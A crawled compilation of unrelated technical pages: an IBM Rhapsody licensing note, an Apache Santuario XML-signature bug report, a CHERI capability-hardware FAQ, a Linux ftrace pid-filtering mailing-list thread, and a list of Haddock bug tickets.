Integrations with other IBM Rational products are now included within the IBM Rational Rhapsody base products for users on active maintenance (Subscription and Support). IBM Rational Rhapsody base products are:

- IBM Rational Rhapsody Developer V7.5.1
- IBM Rational Rhapsody Developer for Ada V7.5.1
- IBM Rational Rhapsody Developer for C++, C, and Java V7.5.1
- IBM Rational Rhapsody Architect for Software V7.5.1
- IBM Rational Rhapsody Architect for Systems Engineers V7.5.1
- IBM Rational Rhapsody Designer for Systems Engineers V7.5.1

Packaging changes

The IBM Rational Rhapsody Interfaces Add On is no longer available for new license purchase, but the product’s functionality is distributed into the base IBM Rational Rhapsody products and the IBM Rational Rhapsody Tools and Utilities Add On. Users who previously purchased the IBM Rational Rhapsody Interfaces Add On can continue purchasing renewal Subscription and Support (maintenance) for their current licenses. In the future, if they wish to add additional licenses for XMI and the MathWorks Simulink interface, they will need to purchase the IBM Rational Rhapsody Tools and Utilities Add On.

The IBM Rational Rhapsody Gateway Add On is no longer offered as a separate product for new license purchase. Basic IBM Rational DOORS and IBM Rational Requisite Pro export of model information is moved into the Rational Rhapsody base products. All other capabilities in the IBM Rational Rhapsody Gateway Add On (including but not limited to impact analysis, coverage analysis, interfaces to other non-IBM requirements management tools, and advanced capabilities of the IBM Rational DOORS and IBM Rational Requisite Pro interfaces) are moved into the IBM Rational Rhapsody Tools and Utilities Add On. Users who have previously purchased the IBM Rational Rhapsody Gateway Add On can continue purchasing renewal Subscription and Support (maintenance) for their current licenses. In the future, if they wish to add additional licenses for impact analysis, coverage analysis, interfaces to other non-IBM requirements management tools, and advanced capabilities of the IBM Rational DOORS and IBM Rational Requisite Pro interfaces, they will need to purchase the IBM Rational Rhapsody Tools and Utilities Add On.

Resources

Learn

- Learn more about IBM Rational Rhapsody.
- Learn more about IBM Rational Quality Manager.
- Learn more about IBM Rational Publishing Engine.
- Explore the Rational Rhapsody Information Center.
http://www.ibm.com/developerworks/rational/library/09/whatsnewinrationalrhapsody-7-5-1/
CC-MAIN-2016-40
en
refinedweb
Details

Description

When generating Enveloping signatures in 1.4.5, they are invalid. These signatures worked in 1.4.4, but now do not work in 1.4.5.

Activity

The test is generating the signature using the org.apache.xml.security APIs, and validating the signature using the JSR 105 APIs (javax.xml.crypto). It seems like a bug or interoperability issue between JDK 6 and Apache Santuario 1.4.5. I believe you are using JDK 6, right? If so, you are by default using the JSR 105 implementation from JDK 6 and not the one bundled with XMLSec 1.4.5. See my blog entry on how to use JDK 6 or later and override it with the JSR 105 implementation in Santuario: When I tested with the JSR 105 implementation in Santuario 1.4.5 I did not see the problem. I'll need to investigate this issue a bit more first to see what the problem may be, and whether it is in JDK 6 or Santuario. Possibly/probably some sort of a C14N issue.

I think it's an issue with Santuario 1.4.5. In our particular use case we're generating signatures with Java and verifying them with C++.

Your test sample seems to be problematic to begin with: you can't use xml as a namespace prefix unless it's defined to be what XML requires (it's reserved). I'm surprised it's parseable, but the bug may simply be a lack of proper error checking for that situation in one of the libraries. In any case, I'd start by using something other than "xml" and see what happens.

I'll be the first to admit I'm a novice at best when it comes to XML and understanding namespaces, baseURIs and all other fun stuff it has. However, it seems as though that is the issue. Changing the XML in my test code to

    String xml = "<test><foo>bar</foo></test>";

results in valid signatures for both 1.4.4 and 1.4.5. So I agree/think that it should probably not generate a signature for the XML if I've screwed it up and/or throw some kind of exception during signing or verification. Thanks for the help though!

It's hard to say exactly what it should do, but I would suggest keeping this open for investigation into what layer is behaving oddly. I'm not really surprised the parsers are broken enough to accept this, and having done that, it's not likely we could or should be just refusing to sign it. The checking alone would add inefficiencies that other people shouldn't pay for. As far as the bug, c14n handles the XML namespace (the one hardwired to that prefix) very particularly, and there's no such thing as an element in that namespace. So I'm sure there's just some code getting confused, and probably behaving differently in different implementations. But it would be good to know where. It also may mean there's a regression somewhere involving c14n of the xml namespace declaration itself, which was an older bug.

Sample code that when run with 1.4.4 is valid, invalid in 1.4.5
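For reference, the JSR 105 validation half of such a test typically looks roughly like the sketch below. This is an illustrative outline only, not the reporter's attached test code; the class name ValidateSketch and the way the signed document and public key are obtained are assumptions.

    import javax.xml.crypto.dsig.XMLSignature;
    import javax.xml.crypto.dsig.XMLSignatureFactory;
    import javax.xml.crypto.dsig.dom.DOMValidateContext;
    import org.w3c.dom.Document;
    import org.w3c.dom.NodeList;
    import java.security.PublicKey;

    public class ValidateSketch {
        // 'doc' is the parsed signed document and 'publicKey' the signer's key,
        // both assumed to come from elsewhere in the test harness.
        static boolean validate(Document doc, PublicKey publicKey) throws Exception {
            NodeList nl = doc.getElementsByTagNameNS(XMLSignature.XMLNS, "Signature");
            if (nl.getLength() == 0) {
                throw new IllegalArgumentException("No ds:Signature element found");
            }
            // Uses whichever JSR 105 provider is active: JDK 6's by default,
            // or Santuario's if it has been registered ahead of it.
            XMLSignatureFactory fac = XMLSignatureFactory.getInstance("DOM");
            DOMValidateContext ctx = new DOMValidateContext(publicKey, nl.item(0));
            XMLSignature signature = fac.unmarshalXMLSignature(ctx);
            return signature.validate(ctx);
        }
    }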
https://issues.apache.org/jira/browse/SANTUARIO-278?attachmentOrder=desc
CC-MAIN-2016-40
en
refinedweb
CHERI

CHERI frequently asked questions (FAQ)

Here are answers to some of the common questions we've received (or in some cases, anticipate) about CHERI. See the BERI FAQ for questions about the BERI platform.

CHERI: Capability Hardware Enhanced RISC Instructions

- What is CHERI?

CHERI refers to Capability Hardware Enhanced RISC Instructions, an Instruction-Set Architecture (ISA) extension that implements a hybrid capability-system model providing fine-grained memory protection and scalable software compartmentalisation. Memory capabilities describe bounded regions of virtual-address space, which may be sealed and combined with protection-domain crossing to implement software compartmentalisation. CHERI is targeted by the compiler and used to represent programming-language level protection properties, in contrast to conventional memory management units (MMUs) that are used to construct page-based virtual memory by operating systems. In CHERI, the capability coprocessor and MMU live side by side, hence being a hybrid model, providing strong protection guarantees while allowing significant compatibility with current software at both binary and source-code levels -- a technique inspired by our earlier work on Capsicum, a hybrid capability-system model for UNIX.

CHERI also refers to our prototype implementation of the ISA, embodied in a capability coprocessor in the BERI implementation. We have released the BERI source code, along with adaptations of the FreeBSD operating system and LLVM compiler suite supporting CHERI. Please see our hardware downloads and software downloads pages for more information. Development of BERI and CHERI was supported by grants from DARPA and Google.

- What is a hybrid capability system?

Capabilities are unforgeable tokens of authority that may be passed from subject to subject (delegated) granting rights to objects; typically, capabilities incorporate both a reference to an object and a mask of permissions reflecting possible operations or methods on the object. Conventional capability systems constrain executing code such that it can access only objects as permitted via capabilities; this limitation might be enforced by constraints imposed by an ISA, operating-system API, programming language, network protocol, or even by static or dynamic limits imposed on a program using code analysis or transformation. Microkernels (such as seL4) often implement capability systems as their fundamental security model as the model provides a strong mechanism on which many different policies can be implemented.

A hybrid capability system is one in which more conventional systems designs (such as a UNIX kernel or RISC processor) are adapted to support a capability model such that some, but not all, code is limited by capability-system constraints, and a set of pragmatic tradeoffs are adopted to allow conventional system objects to be exposed via more capability-esque models. For example, Capsicum composes a capability-system model with the UNIX API, treating file descriptors as capabilities, and allowing selected processes to be marked as losing access to global system namespaces, in effect imposing a capability system. Hybrid capability systems offer improved adoptability by allowing components of existing applications to be selectively migrated to a least-privilege programming model, although at the cost of reduced robustness and security as compared to a pure capability system and application suite written entirely with those goals in mind.
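To make the Capsicum example concrete, here is a minimal hand-written C sketch of that hybrid style on FreeBSD (illustrative only, not taken from the FAQ or the CHERI code): the process opens what it needs, restricts the descriptor to the rights it actually uses, and then enters capability mode so that global namespaces become unreachable.

#include <sys/capsicum.h>
#include <fcntl.h>
#include <unistd.h>
#include <err.h>

int
main(void)
{
	cap_rights_t rights;

	/* Acquire resources while ambient authority is still available. */
	int fd = open("/etc/motd", O_RDONLY);
	if (fd < 0)
		err(1, "open");

	/* Limit the descriptor to read-only use: it becomes a capability. */
	cap_rights_init(&rights, CAP_READ);
	if (cap_rights_limit(fd, &rights) < 0)
		err(1, "cap_rights_limit");

	/* Enter capability mode: open(), socket() etc. on global names now fail. */
	if (cap_enter() < 0)
		err(1, "cap_enter");

	char buf[128];
	ssize_t n = read(fd, buf, sizeof(buf));	/* still permitted */
	(void)n;
	return 0;
}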
- What is the difference between BERI and CHERI?

BERI is the Bluespec Extensible RISC Implementation, a hardware description of a 64-bit pipelined RISC processor, as well as debugging tools and C-language simulated buses and devices. CHERI is a set of ISA and implementation extensions providing fine-grained memory protection and support for scalable software compartmentalisation, developed as part of the CTSRD Project, joint between SRI International and the University of Cambridge Computer Laboratory. The BERI implementation includes optionally compiled support for CHERI, enabled via the CP2 flag at compile-time. CHERI occupies the coprocessor-2 instruction encoding space, and must be explicitly enabled. You may find Capability Hardware Enhanced RISC Instructions: CHERI Instruction-set architecture (UCAM-TR-850) and our ISCA 2014 paper The CHERI capability model: Revisiting RISC in an age of risk useful reading if this is of interest to you.

- Why 32 capability registers?

As our starting point was the 64-bit MIPS ISA, we made a number of design choices to maximise congruence in the CHERI ISA, including selecting 32 capability registers to correspond to the 32 general-purpose registers in the MIPS ISA. This is an arbitrary choice, and one we may revisit due to its size: we believe that a 16-entry capability register file would be entirely adequate. We could also imagine splitting a 16-entry file into two parts, one intended for userspace, and the other for privileged use, to reduce system-call overhead.

- Could you do it with fewer than 256 bits?

256 bits arises out of the desire to support three full 64-bit values (base, length, and type/cursor). A number of proposals have been made for how pointers can be compressed when used in fat-pointer contexts, such as the Low-Fat Pointer scheme proposed by Kwon, et al., which could help reduce this size. In our 2014 ISCA paper, we performed simulations that demonstrated that capability size does play a significant role in performance, and believe that there are plausible 128-bit layouts that retain most of the functionality we desire using a somewhat reduced available address space combined with modest compression schemes. However, based on our goals to support many current software designs via source-level compatibility, we believe that it is important to retain byte-level granularity and so would avoid trying to reduce bit footprint by, for example, reducing this to 32-bit or 64-bit granularity. This is particularly important to handle packet and string parsing.

- Why tagged memory?

Many memory-based attacks on contemporary hardware-software designs rely on corrupting pointers or lengths. Tags provide strong pointer-integrity guarantees that are difficult to implement efficiently without hardware support. Tags add one bit of memory for every 256 bits of data, leading to negligible memory overhead; they are maintained with cache lines and so obey normal cache-coherency rules. In CHERI, we partition physical memory, setting aside a portion to hold tags, rather than requiring a change in the DIMM interface. Currently, that partition is hard-coded, but it would ideally be managed by the firmware or software supervisor.

- How specific is CHERI to the MIPS ISA?

In short, not very: we used the 64-bit MIPS ISA as a starting point as we required large address spaces and access to a conventional software stack, but CHERI is at heart a RISC rather than MIPS-ISA approach.
CHERI is "localised" to MIPS in the sense that it occupies a MIPS-ISA coprocessor encoding, and we adopt a number of design conventions congruent to the MIPS ISA to ease compiler support, but it is easy to imagine applying these ideas to other 64-bit RISC ISAs such as ARMv8 and RISC-V. The current CHERI ISA, as well as information on our design choices and potential applicability to other RISC ISAs, is described in our Capability Hardware Enhanced RISC Instructions: CHERI Instruction-Set Architecture technical report. - How does CHERI compare with other memory-protection schemes? Our 2014 ISCA paper includes a detailed comparison of the protection semantics and performance of CHERI as compared to other schemes, including software bounds checking, Intel MPX, HardBound, Mondriaan, and M-Machine. Each selects a different point in a larger tradeoff space. Key design choices that have motivated CHERI include a focus on providing strong protection for C-language pointers, hybridization with MMU-based virtualization, avoidance of hardware lookup tables and associative structures in the microarchitecture, and strong support for existing software stacks.
http://www.cl.cam.ac.uk/research/security/ctsrd/cheri/cheri-faq.html
CC-MAIN-2016-40
en
refinedweb
Paul Eggert wrote:
> On 11/15/11 05:07, Ludovic Courtès wrote:
>
>> On GNU/Hurd, no error would ever be raised (since uid_t is unsigned),
>
> Ouch. Thanks, now I understand Roland's suggestion.
> How about this patch instead?
>
> id: handle (uid_t) -1 more portably
> * src/id.c (GETID_MAY_FAIL): Remove.
> (main): Check for nonzero errno, rather than having a compile-time
> GETID_MAY_FAIL guess. Suggested by Roland McGrath in
> <>.
> Also, the old code was incorrect if uid_t was narrower than int.
> (print_full_info): Remove unnecessary cast to -1.
>
> diff --git a/src/id.c b/src/id.c
> index 047e40b..9fa93f8 100644
> --- a/src/id.c
> +++ b/src/id.c
> @@ -38,13 +38,6 @@
>    proper_name ("Arnold Robbins"), \
>    proper_name ("David MacKenzie")
>
> -/* Whether the functions getuid, geteuid, getgid and getegid may fail. */
> -#ifdef __GNU__
> -# define GETID_MAY_FAIL 1
> -#else
> -# define GETID_MAY_FAIL 0
> -#endif
> -
>  /* If nonzero, output only the SELinux context. -Z */
>  static int just_context = 0;
>
> @@ -208,22 +201,32 @@ main (int argc, char **argv)
>      }
>    else
>      {
> +      /* POSIX says getuid etc. cannot fail, but they can fail under
> +         GNU/Hurd and a few other systems. Test for failure by
> +         checking errno. */
> +      uid_t NO_UID = -1;
> +      gid_t NO_GID = -1;
> +
> +      errno = 0;
>        euid = geteuid ();
> -      if (GETID_MAY_FAIL && euid == -1 && !use_real
> +      if (euid == NO_UID && errno && !use_real

I like that. Thanks!
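Pulled out of the coreutils sources into a standalone program, the pattern being discussed is simply the following (a minimal sketch, not part of the patch):

#include <errno.h>
#include <stdio.h>
#include <unistd.h>

int
main (void)
{
  /* POSIX says geteuid cannot fail, but on GNU/Hurd it can return
     (uid_t) -1 with errno set when the process has no effective UID.  */
  errno = 0;
  uid_t euid = geteuid ();
  if (euid == (uid_t) -1 && errno)
    {
      perror ("cannot get effective UID");
      return 1;
    }
  printf ("euid=%lu\n", (unsigned long) euid);
  return 0;
}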
http://lists.gnu.org/archive/html/bug-coreutils/2011-11/msg00137.html
CC-MAIN-2016-40
en
refinedweb
On Tue, 25 Nov 2008, Eric W. Biederman wrote:> Steven Rostedt <[email protected]> writes:> > > On Tue, 25 Nov 2008, Dave Hansen wrote:> >> > > >> >> >> > need to care about this. This file may actually be modified in the future > >> > by users, so this may become an issue.> >> > >> This really has very little to do with root vs non-root users. In fact,> >> we're working towards having cases where we have many "root" users, even> >> those inside namespaces. It is also quite possible for a normal root> >> user to fork into a new pid namespace. In that case, root simply won't> >> be able to use this feature because something like:> >> > >> echo $$ /debugfs/tracing/set_ftrace_pid> >> > >> just won't work. Let's look at a bit of the code.> >> > >> +static void ftrace_pid_func(unsigned long ip, unsigned long parent_ip)> >> +{> >> + if (current->pid != ftrace_pid_trace)> >> + return;> >> +> >> + ftrace_pid_function(ip, parent_ip);> >> +}> >> > >> One thing this doesn't deal with is pid wraparound. Does that matter?> >> > Should not. This is just a way to trace a particular process. Currently > > it traces all processes. If we wrap, then we trace the process with the > > new pid. This should not be an issue.> > So. Using raw pid numbers in the kernel is bad form. The internal> representation should be struct pid pointers as much as we can make> them.> > I would 100% prefer it if ftrace_pid_func was written in terms of struct> pid. That does guarantee you don't have pid wrap around issues.> It almost makes it clear > > +static void ftrace_pid_func(unsigned long ip, unsigned long parent_ip)> +{> + if (task_pid(current) == ftrace_pid_trace)> + return;> +> + ftrace_pid_function(ip, parent_ip);> +}> > We don't need locks to access the pid of current.That version does not bother me. I'm not worried about locks as much asI am about recursion. If that "task_pid()" ever became a function that istraced by mcount, then it will end up in a recursive loop, and will crash the system.> > > >> If you want to fix this a bit, instead of saving off the pid_t in> >> ftrace_pid_trace, you should save a 'struct pid'. You can get the> >> 'struct pid' for a particular task by doing a find_get_pid(pid_t). You> >> can then compare that pid_t to current by doing a> >> pid_task(struct_pid_that_i_saved, PIDTYPE_PID). That will also protect> >> against pid wraparound.> >> > >> The find_get_pid() is handy because it will do the pid_t lookup in the> >> context of the current task's pid namespace, which is what you want, I> >> think.> >> > Nope, we can not call that in this context. ftrace_pid_func is called > > directly from mcount, without any protection.> > Of course you can't. But at the same time find_get_pid() is always> supposed to be called on the user space pid ingress path.> > > struct pid *find_get_pid(pid_t nr)> > {> > struct pid *pid;> >> > rcu_read_lock();> > pid = get_pid(find_vpid(nr));> > rcu_read_unlock();> >> > return pid;> > }> > EXPORT_SYMBOL_GPL(find_get_pid);> >> > This means find_get_pid will call mcount which will call ftrace_pid_func, > > and back again. This can also happen with rcu_read_{un}lock() and > > get_pid() and find_vpid().> >> > We can not do anything special here.> > I don't see the whole path. 
But here is the deal.

> 1) Using struct pid and the proper find_get_pid() means that a user with
> the proper capabilities/permissions who happens to be running in a pid
> namespace can call this and it will just work.
>
> 2) The current best practices in the current are to:
> - call find_get_pid() when you capture a user space pid.
> - call put_pid() when you are done with it.
>
> Perhaps that is just:
> put_pid(ftrace_pid_trace);
> ftrace_pid_trace = find_get_pid(user_provided_pid_value);

This may be fine.

> 3) If you ultimately want to support the full gamut:
> thread/process/process group/session. You will need
> to use struct pid pointer comparisons.
>
> 4) When I looked at the place you were concerned about races
> a) you were concerned about the wrong race.
> b) I don't see a race.
> c) You were filtering for the tid of a linux task not
> the tgid of a process. So the code didn't seem to
> be doing what you thought it was doing.
>
> 5) I keep thinking current->pid should be removed some day.
>
> So let's do this properly if we can. This is a privileged operation
> so we don't need to support people without the proper capabilities
> doing this. Or multiple comparisons or anything silly like that. But
> doing this with struct pid comparisons seems cleaner and more maintainable. And that
> really should matter.

Just so you understand what I'm concerned about:

$ objdump -dr kernel/pid.o
[...]
0000025f <find_get_pid>:
 25f:   55                      push   %ebp
 260:   89 e5                   mov    %esp,%ebp
 262:   53                      push   %ebx
 263:   e8 fc ff ff ff          call   264 <find_get_pid+0x5>
                        264: R_386_PC32 mcount
 268:   89 c3                   mov    %eax,%ebx
 26a:   b8 01 00 00 00          mov    $0x1,%eax

looking in arch/x86/kernel/entry_32.S:

ENTRY(mcount)
        cmpl $0, function_trace_stop
        jne  ftrace_stub

        cmpl $ftrace_stub, ftrace_trace_function
        jnz trace
[...]
trace:
        pushl %eax
        pushl %ecx
        pushl %edx
        movl 0xc(%esp), %eax
        movl 0x4(%ebp), %edx
        subl $MCOUNT_INSN_SIZE, %eax

        call *ftrace_trace_function

looking in kernel/trace/ftrace.c:

        if (ftrace_pid_trace >= 0) {
                set_ftrace_pid_function(func);
                func = ftrace_pid_func;
        }

        ftrace_trace_function = func;

And we then have

static void ftrace_pid_func(unsigned long ip, unsigned long parent_ip)
{
        if (current->pid != ftrace_pid_trace)
                return;

        ftrace_pid_function(ip, parent_ip);
}

Now by having ftrace_pid_func call find_get_pid, we have the function flow of...

  schedule() /* any traced function */
    --> mcount
      --> *ftrace_trace_function == ftrace_pid_func
        ftrace_pid_func
          --> find_get_pid
            --> mcount
              --> *ftrace_trace_function == ftrace_pid_func
                ftrace_pid_func
                  --> find_get_pid

  [ ad infinitum ]

The comparison must be very careful not to call anything that will also trace. I can add code to catch this recursion, but this is overhead I do not want to add. Remember, this is called on every function call.

If we do the work at the time we set ftrace_pid_trace and we can do simple pointer comparisons in the ftrace_pid_func, I will be happy with that. I'm still learning about this pid namespace, so I'll probably screw it up a few more times ;-)

-- Steve
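What Steve asks for in the last paragraph, translating the pid once when the file is written and keeping the per-call path to a pointer comparison, would look roughly like the sketch below. This is an illustrative reconstruction rather than the patch that was eventually merged; ftrace_pid_write() and user_provided_pid_value are made-up names.

/* Set once, from the debugfs write path. */
static struct pid *ftrace_pid_trace;

/* Slow path: runs when the user writes to set_ftrace_pid, so it may
 * call find_get_pid()/put_pid() even though they are themselves traced. */
static int ftrace_pid_write(pid_t user_provided_pid_value)
{
	struct pid *pid = find_get_pid(user_provided_pid_value);

	if (!pid)
		return -ESRCH;

	put_pid(ftrace_pid_trace);	/* put_pid(NULL) is a no-op */
	ftrace_pid_trace = pid;
	return 0;
}

/* Hot path: called from mcount on every function entry, so it must stay
 * a plain pointer comparison and call nothing that is itself traced
 * (task_pid() is a static inline, so no mcount call is generated for it). */
static void ftrace_pid_func(unsigned long ip, unsigned long parent_ip)
{
	if (task_pid(current) != ftrace_pid_trace)
		return;

	ftrace_pid_function(ip, parent_ip);
}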
http://lkml.org/lkml/2008/11/26/301
CC-MAIN-2013-48
en
refinedweb
__color__ __group__ ticket summary type owner status created _changetime _description _reporter 3 Release 224 "Link to ""Source"" is not separate by whitespace from preceding content" defect new 2012-10-21T19:47:50Z+0100 2012-10-21T21:08:22Z+0100 "This is annoying when you try to visually mark/select a word, e.g. if you try to select [ openTempFile] in Firefox (with double a click) the ""Source"" link will get selected, too." SimonHengel 3 Release 225 no documentation for re-exported renamed modules defect new Release 226 Add a mechanism to prune deprecated things defect new Release 232 Module re-exports are handled incorrectly defect new 2012-12-12T13:29:31Z+0000 2012-12-12T17:03:07Z+0000 "Contrary to its documentation, Haddock.Interface.Create.moduleExports incorrectly assumes that for a module re-export all of its symbols are re-exported. As an illustration, shows constructors of the Test data type, although it is exported as an abstract type." feuerbach 3 Release 233 "Haddock crashes ""internal error: renameType""" defect new 2013-01-01T01:03:59Z+0000 2013-01-01T01:03:59Z+0000 "When generating docs for, haddock crashes: {{{ ~/code/projects/record/src/Data> haddock Record.hs -v 3 Creating interfaces... Haddock coverage: Checking module Data.Record... Creating interface... doc comment parse failed: See 'alter' > [alt|x|] == alter (undefined :: Key x) doc comment parse failed: See 'access'. > [get|x|] == access (undefined :: Key x) Warning: Data.Record: Instances of type and data families are not yet supported. Instances of the following families will be filte red out: Wrap, ++ Warning: Couldn't find .haddock for export GHC.TypeLits.Symbol 43% ( 15 / 35) in 'Data.Record' Attaching instances... Building cross-linking environment... Renaming interfaces... haddock: internal error: renameType ~/code/projects/record/src/Data> haddock --version Haddock version 2.12.0, (c) Simon Marlow 2006 Ported to use the GHC API by David Waern 2006-2008 }}} This is installed from Arch Linux's [haskell] repository, which says the version is 2.13.1-2. cabal info haddock also says I have 2.13.1 installed. But I trust haddock --version more so that's the version I used for the ticket. :)" mikeplus64 3 Release 234 Including documentation in the export list breaks headings defect new Release 239 Named chunk before imports causes error also if it is placed before module declaration. defect new 2013-02-06T21:12:07Z+0000 2013-02-06T21:12:07Z+0000 ." Davorak 3 Release 241 Ugly definition lists defect Fūzetsu assigned Release 250 haddocs fails to parse U+00A0 (aka c2 a0 NO-BREAK SPACE) in @...@ block, but works in '>' (bird track) defect new 2013-07-20T11:39:09Z+0100 2013-07-20T20:00:11Z+0100 "Bad.hs: {{{ -- | test -- -- @ -- nbsp_c2_a0 = "" "" -- @ module Bad where }}} Good.hs: {{{ -- | test -- -- > nbsp_c2_a0 = "" "" module Good where }}} Be careful: "" "" is ont ""\x20"", but ""\xC2\xA0"" in both cases. Haddock fails to parse Bad.hs, but works on Good.hs: {{{ [sf] /tmp/y:haddock --html src/Good.hs src/Bad.hs Haddock coverage: haddock module header parse failed: Cannot parse header documentation paragraphs 0% ( 0 / 1) in 'Bad' 100% ( 1 / 1) in 'Good' }}} Found in haddock-2.13.2.1. Originally if was found in directory-layour source. Hackage parses it, but not local haddock: Thanks!" slyfox 3 Release 251 don't output warning about missing rts package every time haddock generates docs defect new Release 254 Unexported things are shown as exported defect new 2013-08-29T16:39:20Z+0100 2013-08-31T20:54:57Z+0100 ." 
NeilMitchell 3 Release 255 Rework the test method to prevent failing tests due to interface file version changes. defect Fūzetsu assigned Release 259 Hoogle backend drops documentation for type class fields. defect Fūzetsu new Release 263 --hoogle drops module qualifier in instances defect new Release 267 Docs on arguments parsing failures defect new 2013-10-26T12:50:24Z+0100 2013-10-26T12:50:24Z+0100 "While the following parses fine: {{{ f :: (Show a) => a -- ^ Doc on /a/. -> b -- ^ Doc on /b/. -> c -- ^ Doc on /c/. }}} All the following fail: {{{ f :: (Show a) -- | Doc on /a/. => a -- | Doc on /b/. -> b -- | Doc on /c/. -> c }}} And '''the most irritating''': {{{ f :: (Show a) => -- | Doc on /a/. a -> -- | Doc on /b/. b -> -- | Doc on /c/. c }}} Thereby haddock imposes a certain formatting style, which is not very nice and not at all of its concern." nyvo 3 Release 268 Constraints block doesn't wrap lines defect new 2013-10-26T12:54:56Z+0100 2013-10-26T12:54:56Z+0100 As a result you get a doc like in the attached file[[Image(screenshot.png)]] nyvo 3 Release 269 Unexported symbols crawl out to docs defect new 2013-11-16T00:47:28Z+0000 2013-11-16T00:47:28Z+0000 "Here is a module, in which I reexport just a single function from another module: {{{ module GraphDB ( ... module GraphDB.GenerateBoilerplate, ) where ... import GraphDB.GenerateBoilerplate (generateBoilerplate) }}} The generated doc contains all the functions from this reexported module instead. To reproduce this, just check out the referred project. My Haddock version is 2.13.2.1." nyvo 3 Release 3 feature request: record types with partially exported fields enhancement somebody new 2008-06-17T01:39:02Z+0100 2009-03-25T18:09:56Z+0000 " "" Yes, I κ. Yes, I κ. <% map toUpper ""hello, world!"" %> Yes, I κ.}}} {{{ Yes, I /κ/. Yes, I κ.}}} Therefore, my question is, why is the ampersand escaped when it is inside the emphasis block, but it is not when outside? Is this consistent? I really would like to be able to emphasize characters written as HTML codes. I guess that this is happening because inside an emphasis block no Haddock parsing is done, since I noticed that inline code blocks (@...@) do not work either, which forces me to do things like: {{{ /The command /@foo@/ does not work./ }}} Not a big issue, because at least is possible to get the correct output. However, the same cannot be said about HTML codes. Another note: I think this could imply a drastic change in the Haddock parser, but it would be great if I would not need to emphasize a text line-by-line. Let me explain myself with an example. I would like to write: {{{ -- /I divided this emphasized -- text in multiple lines -- because it was too long for -- a single line./ }}} Instead of: {{{ -- /I divided this emphasized/ -- /text in multiple lines/ -- /because it was too long for/ -- /a single line./ }}}" DanielDiaz 4 Release 261 Add type signatures to index overview enhancement new 2013-09-10T10:04:07Z+0100 2013-09-10T10:04:07Z+0100? quchen 5 Release 6 There should be a --maintainer flag enhancement new 2008-06-19T20:57:40Z+0100 2008-06-19T20:57:40Z+0100 There should be a --maintainer flag to allow Cabal to pass the maintainer from the .cabal file to the generated docs. 
waern 3 2.13.2 Release 89 character references are not recognized in emphasized text defect SimonHengel assigned 2009-02-12T21:00:05Z+0000 2012-10-14T20:08:57Z+0100 If I write {{{/HelloA0;world!/}}} in a doc string, I don’t get a non-breaking space between “Hello” and “world!” in the output but I get “A0;” instead. g9ks157k@… 3 2.13.2 Release 211 () is not hyperlinked anymore defect new 2012-09-21T11:34:09Z+0100 2012-10-15T13:37:18Z+0100 2.13.2 Release 221 references to identifiers are not recognized in emphasized text defect SimonHengel assigned 2012-10-14T20:11:24Z+0100 2012-10-14T20:11:33Z+0100 "Minimal example: {{{ -- | /some `foo` text/ foo :: Int foo = 23 }}}" SimonHengel 3 2.13.2 Release 222 Accept any input when parsing documentation defect new 2012-10-15T00:46:33Z+0100 2012-10-15T00:46:33Z+0100 "The parser for documentation should never fail. If something is no valid Haddock syntax, then it can still be parsed as ordinary text. E.g. the following is currently a parse error: {{{ foo bar > baz }}} But we should instead parse it as: {{{ DocParagraph (DocString ""foo bar\n> baz\n"") }}} That's the way most Markdown parsers do it." SimonHengel 3 2.13.2 Release 223 Deprecation messages for re-eported items from other packages get lost defect new 2012-10-15T09:25:35Z+0100 2012-10-15T09:25:35Z+0100 SimonHengel 3 2.13.2 Release 228 Wrong links for fully qualified identifiers that are not in scope defect new 2012-11-15T15:35:21Z+0000 2013-08-14T15:52:42Z+0100 "If we have something like {{{ 'Control.Concurrent.MVar.addMVarFinalizer' }}} Haddocks thinks it is a type and will prepend a {{t:}} to the generated link. A real world example:" SimonHengel 3 2.13.2 Release 212 Investigate unexpected change with (Monad (Either e)) task new 2012-09-21T15:09:30Z+0100 2012-12-10T13:41:42Z+0000 see: SimonHengel 3 _|_ Release 10 Parsing module without explicit module declaration fails defect SimonHengel assigned 3 _|_ Release 94 Give a useful warning message instead of a cryptic parse error when encountering unexpected Haddock comments enhancement new 2009-03-01T12:13:29Z+0000 2012-03-10T00:22:08Z+0000 "See this failure when processing XMon) }}} Since we don't support Haddock comments on individual arguments of constructors, this just fails with a parse error. Perhaps we should give a warning message instead. In general, it would be good if we give a warning message instead of a parse error whenever a Haddock comment is encountered where it is not expected. I think implementing this is hard, given the way things currently work. Haddock comments are just ordinary tokens that are fed to the parser in GHC, and we clearly don't want put them all over the grammar. If we should move to a design where Haddock comments are not in the grammar, but are collected elsewhere, implementing this ticket would be easier." waern 3 None 79 Source links don't work for things defined using Template Haskell defect new 2009-02-04T22:47:31Z+0000 2012-09-25T12:09:54Z+0100 The reason for this is that HsColour can't insert anchors for TH declarations. Perhaps TH defs could be linked by line number somehow? (This would obviously need to be coordinated with HsColour.) SamB 3 None 80 No way to express docstrings in Template Haskell defect new None 101 haddock-2.4.2 shipped with ghc-6.10.2 is extremely slow defect new 2009-04-21T12:49:02Z+0100 2012-09-25T12:09:54Z+0100 `) " maeder 3 None 138 Malformed or missing comments in files with #line directive defect new 2010-07-08T04:56:19Z+0100 2012-09-25T12:09:54Z+0100 ." 
jmillikin 3 None 151 long lines in the synopsis defect new 2010-09-16T09:03:20Z+0100 2012-09-25T12:09:54Z+0100 "the synopsis widget looks bad for very long lines (which is bad style anyway). e.g." bastl 3 None 157 Push/improve Haddock API and .haddock files usage defect new 2010-11-04T16:28:42Z+0000 2012-09-25T12:09:54Z+0100 "I'd expect Haddock processing to involve three stages: 1. extract information for each file/package 2. mix and match information batches for crosslinking 3. generate output for each file/package where the results of 1 should be available `.haddock` files, so that stage 2/3 tools can start from there if source isn't available, and the results of 2 should be exposed in the API, so that it can be shared between backends. Currently, backends such as `--hoogle` can't start from `.haddock` files, and stage 2 processing is duplicated in what should be stage 3-only backends. It might also be useful to think about the representation of the output of stage 2 above: currently, Haddock directly generates indices in XHtml form, even though much of the index computation should be shareable accross backends. Relatedly, the Haddock executable should be a thin wrapper over the Haddock API, if only to test that the API exposes sufficient functionality for implementing everything Haddock can do. Instead, there is an awful lot of useful code in Haddock's Main.hs, which is not available via the API. So when coding against the API, for instance, to extract information from .haddock files, one has to copy much of that code. Also, some inportant functionality isn't exported (e.g., the standard form of constructing URLs), so it has to be copied and kept in synch with the in-Haddock version of the code. Overall, it seems that exposing sufficient information in the API, and allowing `.haddock` interface files as first-class inputs, there should be less need for hardcoding external tools into Haddock (such as --hoogle, or haddock-leksah). Instead, clients should be able to code alternative backends separately, using Haddock to extract information from sources into `.haddock` files, and the API for processing those `.haddock` files. (splitting Haddock into frontend/indexer/backend would be better than similar 